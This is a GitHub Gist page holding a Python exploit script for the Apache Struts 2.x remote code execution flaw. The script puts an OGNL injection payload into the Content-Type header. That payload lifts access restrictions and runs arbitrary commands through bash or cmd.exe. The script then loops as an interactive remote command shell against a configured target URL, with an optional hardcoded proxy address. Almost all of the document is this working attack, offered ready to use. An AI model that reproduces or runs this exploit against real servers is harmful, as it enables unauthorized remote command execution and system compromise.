Last active
February 27, 2024 07:43
-
-
Save shafdo/8ad7590ed1a08392cbf22d20a2fbb862 to your computer and use it in GitHub Desktop.
A script to exploit Struts 2.x RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
The following versions of Struts are affected: | |
Struts 2.3.5 | |
Struts 2.3.31 | |
Struts 2.5 | |
Struts 2.5.10 | |
''' | |
import requests | |
#################### EDIT BELLOW ######################### | |
proxy = {"http": "http://200.123.182.25:8081"} # You can add burp, anyother proxy or even go without proxy. | |
url = "http://ptl-b25057ac-0d58bb5e.libcurl.so/example/HelloWorld.action" | |
#################### EDIT ABOVE ######################### | |
print("/\/\/\/\/ Starting /\/\/\/\/\n") | |
def getHeader(command): | |
# Generate Payload Header | |
payload = {"Content-Type": "%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"} | |
return payload | |
# Is the URL working, hmmm ? | |
res = requests.get(url) | |
if(res.status_code >= 400): print("[-] URL Not Reachable !"); exit() | |
print("[+] URL seems to be working fine :)") | |
print("[+] Setting up command interface.\n") | |
while 1: | |
command = input("/\/\ Command => ") | |
if(command == "exit"): print("[+] Happy Hacking :)\n"); break | |
print("[+] Sending Payload.\n") | |
if(len(command) < 1): continue | |
res = requests.get(url, headers=getHeader(command), proxies=proxy) | |
print(res.content.decode("utf-8")) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment